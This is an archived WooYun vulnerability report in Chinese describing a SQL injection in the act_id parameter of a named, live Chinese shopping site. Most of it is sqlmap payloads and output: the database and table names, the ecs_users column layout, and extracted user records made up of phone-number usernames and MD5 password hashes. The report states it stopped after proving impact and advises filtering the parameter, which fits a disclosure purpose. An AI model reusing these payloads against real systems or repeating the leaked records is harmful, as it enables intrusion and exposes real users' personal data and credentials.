乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-01-09: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入
网站地址:http://www.whjdsc.com/
注入点:http://www.whjdsc.com/goods_sales.php?act_id=4注入参数:act_id可直接拖库,泄漏管理员以及会员敏感信息。
GET parameter 'act_id' is vulnerable. Do you want to keep testing the others? [y/N] ysqlmap identified the following injection points with a total of 28 HTTP(s) requests:---Place: GETParameter: act_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act_id=4 AND 2021=2021 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act_id=4 AND (SELECT 8873 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,115,107,58),(SELECT (CASE WHEN (8873=8873) THEN 1 ELSE 0 END)),CHAR(58,102,112,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)---[12:14:01] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: PHP 5.2.6, Microsoft IIS 6.0back-end DBMS: MySQL 5.0[12:14:01] [INFO] fetching database names[12:14:01] [INFO] the SQL query used returns 2 entries[12:14:01] [INFO] retrieved: information_schema[12:14:01] [INFO] retrieved: whjdscavailable databases [2]:[*] information_schema[*] whjdsc
很明显,whjdsc是我们关注的数据库:
Database: whjdsc[91 tables]+-------------------------+| ecs_account_log || ecs_ad || ecs_ad_custom || ecs_ad_position || ecs_admin_action || ecs_admin_log || ecs_admin_message || ecs_admin_user || ecs_adsense || ecs_affiliate_log || ecs_agency || ecs_area_region || ecs_article || ecs_article_cat || ecs_attribute || ecs_auction_log || ecs_auto_manage || ecs_back_goods || ecs_back_order || ecs_bonus_type || ecs_booking_goods || ecs_brand || ecs_card || ecs_cart || ecs_cat_recommend || ecs_category || ecs_collect_goods || ecs_comment || ecs_crons || ecs_delivery_goods || ecs_delivery_order || ecs_email_list || ecs_email_sendlist || ecs_error_log || ecs_exchange_goods || ecs_favourable_activity || ecs_feedback || ecs_friend_link || ecs_goods || ecs_goods_activity || ecs_goods_article || ecs_goods_attr || ecs_goods_cat || ecs_goods_gallery || ecs_goods_type || ecs_goods_visiter || ecs_group_goods || ecs_keywords || ecs_link_goods || ecs_mail_templates || ecs_member_price || ecs_nav || ecs_order_action || ecs_order_goods || ecs_order_info || ecs_pack || ecs_package_goods || ecs_pay_log || ecs_payment || ecs_plugins || ecs_products || ecs_reg_extend_info || ecs_reg_fields || ecs_region || ecs_role || ecs_searchengine || ecs_sessions || ecs_sessions_data || ecs_shipping || ecs_shipping_area || ecs_shop_config || ecs_snatch_log || ecs_stats || ecs_suppliers || ecs_tag || ecs_template || ecs_topic || ecs_user_account || ecs_user_address || ecs_user_bonus || ecs_user_feed || ecs_user_rank || ecs_users || ecs_virtual_card || ecs_volume_price || ecs_vote || ecs_vote_log || ecs_vote_option || ecs_wholesale || ecs_zxcomment || neworder |+-------------------------+
这里边有很多表,重点是ecs_admin_user和ecs_users:
管理员帐号密码已经出来。继续看ecs_users表:
Database: whjdscTable: ecs_users[35 columns]+-----------------+------------------------+| Column | Type |+-----------------+------------------------+| address_id | mediumint(8) unsigned || aite_id | text || alias | varchar(60) || answer | varchar(255) || birthday | date || credit_line | decimal(10,2) unsigned || ec_salt | varchar(10) || email | varchar(60) || flag | tinyint(3) unsigned || frozen_money | decimal(10,2) || home_phone | varchar(20) || is_special | tinyint(3) unsigned || is_validated | tinyint(3) unsigned || last_ip | varchar(15) || last_login | int(11) unsigned || last_time | datetime || mobile_phone | varchar(20) || msn | varchar(60) || office_phone | varchar(20) || parent_id | mediumint(9) || passwd_answer | varchar(255) || passwd_question | varchar(50) || password | varchar(32) || pay_points | int(10) unsigned || qq | varchar(20) || question | varchar(255) || rank_points | int(10) unsigned || reg_time | int(10) unsigned || salt | varchar(10) || sex | tinyint(1) unsigned || user_id | mediumint(8) unsigned || user_money | decimal(10,2) || user_name | varchar(60) || user_rank | tinyint(3) unsigned || visit_count | smallint(5) unsigned |+-----------------+------------------------+
用户详细都在这里。列一部分:
[12:52:18] [INFO] fetching columns 'user_name, password, user_id, mobile_phoneentries for table 'ecs_users' on database 'whjdsc'[12:52:18] [INFO] the SQL query used returns 145 entries[12:52:18] [INFO] retrieved: 12345678912[12:52:19] [INFO] retrieved: 554fcae493e564ee0dc75bdf2ebf94ca[12:52:19] [INFO] retrieved: 1[12:52:19] [INFO] retrieved: 125882949[12:52:19] [INFO] retrieved: 232059cb5361a9336ccf1b8c2ba7657a[12:52:19] [INFO] retrieved: 2[12:52:19] [INFO] retrieved: 13329749788[12:52:20] [INFO] retrieved: 1cb251ec0d568de6a929b520c4aed8d1[12:52:20] [INFO] retrieved: 3[12:52:20] [INFO] retrieved: 13554090008[12:52:20] [INFO] retrieved: 815a71fb334412e7ba4595741c5a111d[12:52:20] [INFO] retrieved: 5[12:52:28] [INFO] retrieved: 13971362808[12:52:28] [INFO] retrieved: eac4108912af90ae96e858190f4d8af7[12:52:29] [INFO] retrieved: 6[12:52:29] [INFO] retrieved: 750155706[12:52:29] [INFO] retrieved: 13995669913[12:52:29] [INFO] retrieved: 6e3c4c536c79a52bfcdd9328048ca75e[12:52:29] [INFO] retrieved: 7[12:52:29] [INFO] retrieved: 18672192586[12:52:29] [INFO] retrieved: 96e79218965eb72c92a549dd5a330112[12:52:30] [INFO] retrieved: 8[12:52:30] [INFO] retrieved: 18955163067[12:52:30] [INFO] retrieved: a684224d67907e32a7ba70ebfa67efce[12:52:30] [INFO] retrieved: 9[12:52:30] [INFO] retrieved: 18998752158[12:52:31] [INFO] retrieved: 5eee5eead6fd883106ffd6e9d1f0f65a[12:52:31] [INFO] retrieved: 10[12:52:31] [INFO] retrieved: 56658585[12:52:31] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e[12:52:31] [INFO] retrieved: 11[12:52:32] [INFO] retrieved: 5800[12:52:32] [INFO] retrieved: 305a02ad3d398666e32ca6d194b1370a[12:52:32] [INFO] retrieved: 12[12:52:32] [INFO] retrieved: admin1[12:52:32] [INFO] retrieved: 62bb11f0245ecb7ae19e0fe1f3cbf4bc[12:52:32] [INFO] retrieved: 13[12:52:33] [INFO] retrieved: admin2[12:52:33] [INFO] retrieved: 3e7276336d9f5ac19eb71d125048e3d4[12:52:33] [INFO] retrieved: 14[12:52:33] [INFO] retrieved: AdomaGaffef[12:52:33] [INFO] retrieved: d1c92a24639ae1d523cfa62e71c6dd2e[12:52:33] [INFO] retrieved: 15[12:52:34] [INFO] retrieved: ageless[12:52:34] [INFO] retrieved: 2b9358635e18f1f66b222111ee1240d1
只证明危害,就到这里不继续测试。
act_id参数严格过滤。。
未能联系到厂商或者厂商积极拒绝